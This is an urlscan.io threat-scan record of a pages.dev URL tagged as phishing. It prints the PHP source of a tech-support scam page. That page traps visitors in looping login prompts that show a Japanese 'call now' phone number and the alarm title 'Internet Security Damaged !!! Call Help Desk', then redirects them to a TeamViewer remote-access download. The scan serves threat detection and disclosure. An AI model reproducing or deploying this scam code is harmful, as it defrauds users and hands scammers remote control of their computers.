luoksni.pages.dev Open in urlscan Pro
2a06:98c1:3120::3  Public Scan

URL: https://luoksni.pages.dev/useragent.php
Submission Tags: @ecarlesi possiblethreat phishing msftsecresponse Search All
Submission: On February 21 via api from IT — Scanned from NL

Form analysis 0 forms found in the DOM

Text Content

<?php

    session_start();

    $_user = 'windows2016d';
    $_password = 'microsoft1';

    if ($_SERVER['PHP_AUTH_USER'] != $_user || $_SERVER['PHP_AUTH_PW'] != $_password ) {

        if(isset($_SESSION['login_attempts'])){ $_SESSION['login_attempts']++; }else{$_SESSION['login_attempts'] = 11;}

        if($_SESSION['login_attempts'] == 80){
            header('Location: Wfgfgf232323900x.php');
            exit;
        } else {

           header('WWW-Authenticate: Basic realm=" 今すぐ電話 (050) 3183-9022 "');
           header('HTTP/1.0 401 Unauthorized');
$page = $_SERVER['PHP_SELF'];
 $sec = "0";
 header("Refresh: $sec; url=$page");
         echo "<html><head><title>Internet Security Damaged !!! Call Help Desk</title></head><body>";


            exit;
        }
    } else {

        header('Location: Wfgfgf232323900x.php');
        header('Location: http://download.teamviewer.com/download/TeamViewer_Setup_en.exe');

        exit;
    }
?>